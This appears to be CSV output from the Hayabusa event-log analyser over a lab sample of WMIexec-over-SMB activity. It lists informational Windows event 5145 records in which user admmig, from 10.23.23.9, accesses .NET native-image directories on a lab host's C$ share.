10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Temp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : 